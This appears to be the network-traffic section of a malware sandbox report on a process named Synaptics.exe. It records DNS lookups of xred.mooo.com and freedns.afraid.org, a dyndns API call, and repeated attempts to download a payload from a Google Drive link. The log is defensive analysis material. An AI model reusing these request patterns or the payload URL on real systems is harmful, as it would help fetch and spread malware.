Jan 2, 2025 20:41:45.498830080 CET	49880	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:45.498847008 CET	443	49880	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:45.514769077 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:45.514815092 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:45.514904976 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:45.515146971 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:45.515165091 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.161021948 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.161134005 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.161798954 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.161864042 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.163770914 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.163778067 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.164031982 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.164076090 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.164532900 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.207330942 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.547792912 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.547909975 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.547935963 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.547993898 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.548051119 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.548094034 CET	443	49887	216.58.212.174	192.168.2.4
Jan 2, 2025 20:41:46.548142910 CET	49887	443	192.168.2.4	216.58.212.174
Jan 2, 2025 20:41:46.554939985 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:46.554966927 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:46.555078983 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:46.555293083 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:46.555320024 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.190045118 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.190114021 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:47.190583944 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:47.190596104 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.190777063 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:47.190783978 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.619601965 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.619658947 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:47.619668007 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.619692087 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.619713068 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:47.619731903 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:47.619739056 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.619781017 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:41:47.619822025 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:47.620379925 CET	49893	443	192.168.2.4	142.250.185.65
Jan 2, 2025 20:41:47.620394945 CET	443	49893	142.250.185.65	192.168.2.4
Jan 2, 2025 20:42:32.216604948 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:42:32.529062033 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:42:33.138232946 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:42:34.341449976 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:42:36.747646093 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:42:41.560106993 CET	49736	80	192.168.2.4	69.42.215.252
Jan 2, 2025 20:42:51.169559956 CET	49736	80	192.168.2.4	69.42.215.252

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:40:42.109169006 CET	59837	53	192.168.2.4	1.1.1.1
Jan 2, 2025 20:40:42.215807915 CET	53	59837	1.1.1.1	192.168.2.4
Jan 2, 2025 20:40:42.231723070 CET	55087	53	192.168.2.4	1.1.1.1
Jan 2, 2025 20:40:42.238749981 CET	53	55087	1.1.1.1	192.168.2.4
Jan 2, 2025 20:41:41.064774036 CET	64860	53	192.168.2.4	1.1.1.1
Jan 2, 2025 20:41:41.071477890 CET	53	64860	1.1.1.1	192.168.2.4
Jan 2, 2025 20:41:42.169637918 CET	61764	53	192.168.2.4	1.1.1.1
Jan 2, 2025 20:41:42.176378965 CET	53	61764	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 20:40:42.109169006 CET	192.168.2.4	1.1.1.1	0x3e94	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:40:42.231723070 CET	192.168.2.4	1.1.1.1	0x1e0c	Standard query (0)	freedns.afraid.org	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:41:41.064774036 CET	192.168.2.4	1.1.1.1	0x3e36	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:41:42.169637918 CET	192.168.2.4	1.1.1.1	0x30a9	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 20:40:42.215807915 CET	1.1.1.1	192.168.2.4	0x3e94	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:40:42.238749981 CET	1.1.1.1	192.168.2.4	0x1e0c	No error (0)	freedns.afraid.org		69.42.215.252	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:41:24.993062973 CET	1.1.1.1	192.168.2.4	0xb027	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 20:41:24.993062973 CET	1.1.1.1	192.168.2.4	0xb027	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:41:41.071477890 CET	1.1.1.1	192.168.2.4	0x3e36	No error (0)	docs.google.com		216.58.212.174	A (IP address)	IN (0x0001)	false
Jan 2, 2025 20:41:42.176378965 CET	1.1.1.1	192.168.2.4	0x30a9	No error (0)	drive.usercontent.google.com		142.250.185.65	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

docs.google.com

drive.usercontent.google.com

freedns.afraid.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	69.42.215.252	80	648	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 20:40:42.249773979 CET	154	OUT	GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
Jan 2, 2025 20:40:42.853486061 CET	243	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 02 Jan 2025 19:40:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fERROR: Could not authenticate.0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49853	216.58.212.174	443	648	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:41:41 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2025-01-02 19:41:42 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:41:41 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-sLA8BgH8ZoJ9FxSDkMQEmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49863	142.250.185.65	443	648	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:41:42 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-02 19:41:43 UTC	1601	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC60UMv9jdCeYD78Uy2VkeW2wfsUJiUd8x7GmtwoeV2BEt7tW73vB2FhwU0U2GgJsGTJ_2pdTDI Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:41:43 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-LmsSgu6SGa5Uu6xBTtNPcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg; expires=Fri, 04-Jul-2025 19:41:43 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-02 19:41:43 UTC	1601	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 51 58 67 59 6c 5f 47 72 53 35 4d 7a 4e 62 30 34 75 34 50 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9QXgYl_GrS5MzNb04u4PLA">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-01-02 19:41:43 UTC	51	IN	Data Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: his server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49869	216.58.212.174	443	648	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:41:44 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg
2025-01-02 19:41:44 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:41:44 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-OxMLZntIVaEBOH1VjyGJOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49880	142.250.185.65	443	648	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:41:45 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg
2025-01-02 19:41:45 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5vS99YvCHeQo5UKS2s6XVlfJiBtgWVzNTDStlEycnmdPL7thyFvt6noQUTLiWpO6AKqLPrh8s Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:41:45 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-9MB1npEM7b4K-v9-xRPSBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-02 19:41:45 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:41:45 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 33 79 64 62 62 6d 71 49 63 6f 6c 78 57 37 6d 74 4f 6e 45 6e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="g3ydbbmqIcolxW7mtOnEnA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2025-01-02 19:41:45 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49887	216.58.212.174	443	648	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:41:46 UTC	344	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg
2025-01-02 19:41:46 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:41:46 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-vZtIgkEdNRqTtc-ZQMxRkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49893	142.250.185.65	443	648	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:41:47 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=lSm9ELS1mT_NJfPcL6s2k9KF40P-p_PHfsCVyyjYOh5O_FCuZomYPERO12Ni77Jp7w8szZNvUT40gG7k03Vgjfofr2RWsKCMMqzS4A8F8ycWckzt7AMicc8H9ffid0GpKy9MCFWKF0kMsQyHDjZ5qSu9Cqx-RH8SZWoLf6lyj0jhFG_xzvZAWZg
2025-01-02 19:41:47 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4SJaGJv1NDMTqC_oXqIk5gNT1iFvsSse1ESBhgKJeDbWchWiWb7pdDdJgGWB8sET60stBhbxY Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Jan 2025 19:41:47 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-_uejDZ1rBjCZrXvUMr-Jqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-02 19:41:47 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2025-01-02 19:41:47 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 73 6a 64 72 43 31 5a 76 54 5f 76 4e 4a 61 4d 6b 51 72 6e 73 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="6sjdrC1ZvT_vNJaMkQrnsQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
